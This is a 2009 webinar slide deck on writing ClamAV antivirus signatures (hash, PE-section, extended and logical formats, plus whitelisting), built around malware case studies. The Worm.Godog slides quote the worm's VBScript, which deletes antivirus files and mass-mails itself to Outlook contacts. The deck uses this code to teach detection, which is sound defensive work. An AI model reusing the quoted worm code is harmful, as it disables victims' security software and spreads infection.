SlideShare a Scribd company logo

Webinar alain-2009-03-04-clamav

T
thc2cat

Alain Zidouemba presented on writing signatures for ClamAV. He discussed the different signature formats including .hdb, .mdb, .ndb, and .ldb. He provided examples of generating signatures using hash databases and extended signatures. He also demonstrated how to write logical signatures in .ldb format through a case study of the Worm.Godog malware. Whitelisting techniques were also covered, including adding entries to ignore specific signatures.

1 of 35
Download to read offline
Writing ClamAV Signatures Alain Zidouemba March 4, 2009
About the presenter Alain Zidouemba • VRT Research Engineer for over a year • Primary responsibilities: • Malware research & signatures generation – ClamAV • Vulnerability research & rules generation – Snort • Before Sourcefire: Anti-Malware Research Engineer 2
Outline What is ClamAV Where to get ClamAV Different ClamAV signature formats: • .hdb • .mdb • .ndb • .ldb Whitelisting Q&A 3
ClamAV
What is ClamAV? Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways Provides a number of utilities including: • A flexible and scalable multi-threaded daemon (clamd) • A command line scanner (clamscan)‫‏‬ • An advanced tool for automatic database updates (freshclam)‫‏‬ • Sigtool – more later 5
Where can I get ClamAV from? Latest stable release: ClamAV 0.94.2 • http://www.clamav.net/download/sources Most popular UNIX operating systems are supported: • GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X Up-to-date list of binary packages is available at our website: • http://clamav.net/download/packages 6
Why learn how to write sigs? I thought Sourcefire released signatures updates several times a day! 7
ClamAV malware detection Goal: recognize and block malware Detection is: • File-centric • Focus on recognizing malicious code in file Not intended to replace desktop AV First line of defense 8
ClamAV Virus Database (CVD) The ClamAV project distributes two CVD files • main.cvd • daily.cvd Sigtool (ships with ClamAV) can display detailed information on CVD files: 9
Various signature files in .cvd archive 10
Writing signatures for ClamAV
Hash database: *.hdb The format for .hdb files is as follows: • MD5:Size:MalwareName To create a signature for test.exe use the --md5 option of sigtool: 12
Hash database: *.hdb (cont’d) That’s it! The signature is ready to be used: • The name for the detection can be changed: 13
MD5, PE-section based: *.mdb The format for .mdb files is as follows: • PESectionSize:MD5:MalwareName The easiest way to generate MD5 based section signatures is to extract target PE sections into separate files and then run sigtool with the option -- mdb: 14
Case study: Trojan.Bagle-328 IDA Pro indicates that the sample is “packed” Packed with Themida (as per PEiD)‫‏‬ 15
Case study: Trojan.Bagle-328 (cont'd) Themida is used by malware writers...but also by legitimate products – false positive likely We can use pe-sig, a Ruby script that will create sigs for each section of a PE file: Finally, the signature is: • 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328 16
Extended sig. format: *.ndb The format for .ndb files is as follows: • MalwareName:TargetType:Offset:HexSignature • TargetType is one of the following numbers specifying the type of the target file: 0: Any file 4: Mail File 1: Portable Executable 5: Graphics 2: OLE2 component (eg: VBA script) 6: ELF 3: HTML (normalized) 7: ASCII text file (normalized) 17
Case study: Trojan.Exchanger Many files that are very similar yet different 18
Case study: Trojan.Exchanger (cont’d) 5.exe: Opcode: • e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4 Signature: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4 19
Case study: Trojan.Exchanger (cont’d) 7.exe: Opcode: • e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4 Signature: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4 20
Case study: Trojan.Exchanger (cont’d) Signature for 5.exe: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4 Signature for 7.exe: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4 Signature to detect both 5.exe and 7.exe: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4 21
Case study: Trojan.Exchanger (cont’d) Moreover, for 5.exe: • EP: 0x4094E0 • Binary string: 0x4095C5 For 7.exe: • EP: 0x406D87 • Binary string: 0x406E6C In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal) 22
Case study: Trojan.Exchanger (cont’d) Finally we can rewrite the signature to be: • Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4 This signature is more precise and even matches other samples: 23
Logical signatures: *.ldb‫‏‬ Logical signatures introduced in ClamAV 0.94 The format for .ldb files is as follows: • SignatureName;TargetDescriptionBlock;LogicalExpr ession;Subsig0;Subsig1;Subsig2;... 24
Case study: Worm.Godog A mass-mailer worm, code is in VBS Registro = legion.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")‫‏‬ If FileExists (Registro & "Kaspersky LabKaspersky Antivirus Personal ProAvp32.exe") then path = Registro & "Kaspersky LabKaspersky Antivirus Personal Pro" legions.DeleteFile (Registro & "Kaspersky LabKaspersky Antivirus Personal Pro*.*")‫‏‬ If fileexists (Registro & "Kaspersky LabKaspersky Antivirus PersonalAvp32.exe") then path = Registro & "Kaspersky LabKaspersky Antivirus Personal" legions.DeleteFile (Registro & "Kaspersky LabKaspersky Antivirus Personal*.*")‫‏‬ if FileExists(Registro & "Antiviral Toolkit Proavp32.exe") then path = Registros & "Antiviral Toolkit Pro" legions.DeleteFile (Registro & "Antiviral Toolkit Pro*.*")‫‏‬ if fileexists (Registro & "AVPersonalAvguard.exe") then path = Registro & "AVPersonal" legions.DeleteFile (Registro & "AVPersonal*.*")‫‏‬ if fileexists (Registro & "Trend PC-cillin 98IOMON98.EXE") then path = Registro & "Trend PC-cillin 98" legions.DeleteFile (Registro & "Trend PC-cillin 98*.*")‫‏‬ legions.DeleteFile (Registro & "Trend PC-cillin 98*.EXE")‫‏‬ legions.DeleteFile (Registro & "Trend PC-cillin 98*.dll") 25
Case study: Worm.Godog (cont’d) After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows: (0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c {-100}2e64656c65746566696c652028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c (1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f {-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f (2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028 {-25}202620225c6176706572736f6e616c (3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e {-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e 26
Case study: Worm.Godog (cont’d) Worm also send itself to the first 8000 contacts found in the address book: Set Create = CreateObject ("Scripting.FileSystemObject")‫‏‬ Set mail = Create.CreateTextFile("C:mail.vbs")‫‏‬ mail.writeline "On Error Resume Next" mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E" mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")" mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")" mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")" mail.writeline "For A = 1 To Mail.AddressLists.Count" mail.writeline "Set B = Mail.AddressLists (A)" mail.writeline "Counter = 1" mail.writeline "Set C = leg.CreateItem (0)" mail.writeline "For D = 1 To B.AddressEntries.Count" mail.writeline "E = B.AddressEntries (Counter)" mail.writeline "C.Recipients.Add E" mail.writeline "Counter = Counter + 1" mail.writeline "If Counter > 8000 Then Exit For" mail.writeline "Next" mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)‫‏‬ mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34) ‫‏‬ mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:Legion.vbs" & Chr(34)‫‏‬ mail.writeline "C.DeleteAfterSubmit = True" mail.writeline "C.Send" mail.writeline "Next" mail.Close legion.Run ("C:mail.vbs") 27
Case study: Worm.Godog (cont’d) A signature to detect this worm portion of the file could be: (4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74 {-100}726563697069656e74732e616464{-100}696620{-10}203e20 {-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464 {-150}2e73656e64 Finally, we can write this highly flexible signature: • Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4) in a .ldb file: Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c ;66696c6565786973747328{- 25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{- 25}202620225c616e7469766972616c20746f6f6c6b69742070726f; 66696c656578697374732028{-25}202620225c6176706572736f6e616c{- 100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c; 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{- 100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e ;666f7220{-10}203d203120746f20{- 10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{- 300}2e6174746163686d656e74732e616464{-150}2e73656e64 28
Whitelisting To whitelist a specific file create an entry in a database file with the extension of .fp following the MD5 signature format: • MD5:FileSize:Comment 29
Whitelisting (cont’d) To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign: • db_name:line_number:signature_name To ignore the “myTestSignature” at line 23 in test.ndb: • test.ndb:23:myTestSignature Daily.ign: 30
More questions? clamav-users@lists.clamav.net - user questions clamav-devel@lists.clamav.net - technical discussions Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net If you have questions or comments on this presentation: azidouemba@sourcefire.com 31
ClamAV/VRT/Sourcefire Websites • http://www.clamav.net • http://www.snort.org • htttp://www.sourcefire.com Blogs • http://clam-av.blogspot.com • http://vrt-sourcefire.blogspot.com 32
Contribute Sample submission • http://www.clamav.net/sendvirus/ Upload statistics: • freshclam --submit-stats Bug submission • http://bugs.clamav.net 33
Q&A
NOW GO AND WRITE SIGNATURES! 35 Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714

Recommended

Fuzzing - Part 1
Fuzzing - Part 1Fuzzing - Part 1
Fuzzing - Part 1
UTD Computer Security Group
 
A New Framework for Detection
A New Framework for DetectionA New Framework for Detection
A New Framework for Detection
Sourcefire VRT
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
Javier Junquera
 
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
RootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
RootedCON
 
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
RootedCON
 

Recommended

Fuzzing - Part 1
Fuzzing - Part 1Fuzzing - Part 1
Fuzzing - Part 1
UTD Computer Security Group
 
A New Framework for Detection
A New Framework for DetectionA New Framework for Detection
A New Framework for Detection
Sourcefire VRT
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
Javier Junquera
 
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
RootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
RootedCON
 
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
RootedCON
 
Sourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team LabsSourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team Labs
losalamos
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueDARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
Chong-Kuan Chen
 
Mem forensic
Mem forensicMem forensic
Mem forensic
Chong-Kuan Chen
 
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Minsk Linux User Group
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
PROIDEA
 
Control hijacking
Control hijackingControl hijacking
Control hijacking
G Prachi
 
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Alexis Von Glasow
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
snyff
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NoSuchCon
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
INSIGHT FORENSIC
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Positive Hack Days
 
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Codemotion
 
Let's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and DetectionLet's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and Detection
James Haughom Jr
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
Felipe Prado
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
Dr. Ramchandra Mangrulkar
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
PVS-Studio
 

More Related Content

What's hot

Sourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team LabsSourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team Labs
losalamos
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueDARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
Chong-Kuan Chen
 
Mem forensic
Mem forensicMem forensic
Mem forensic
Chong-Kuan Chen
 
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Minsk Linux User Group
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
PROIDEA
 
Control hijacking
Control hijackingControl hijacking
Control hijacking
G Prachi
 
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Alexis Von Glasow
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
snyff
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NoSuchCon
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
INSIGHT FORENSIC
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Positive Hack Days
 
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Codemotion
 
Let's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and DetectionLet's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and Detection
James Haughom Jr
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
Felipe Prado
 

What's hot (20)

Sourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team LabsSourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team Labs
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
 
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueDARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
 
Mem forensic
Mem forensicMem forensic
Mem forensic
 
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
 
Control hijacking
Control hijackingControl hijacking
Control hijacking
 
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
 
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
 
Let's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and DetectionLet's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and Detection
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
 

Similar to Webinar alain-2009-03-04-clamav

Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
Dr. Ramchandra Mangrulkar
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
PVS-Studio
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
Andrey Karpov
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)
Rémi Jullian
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
Stefano Maccaglia
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
Nahidul Kibria
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysis
Chong-Kuan Chen
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
Stefano Maccaglia
 
cinema_time_new.pdf
cinema_time_new.pdfcinema_time_new.pdf
cinema_time_new.pdf
MaxDmitriev
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
J Hartig
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
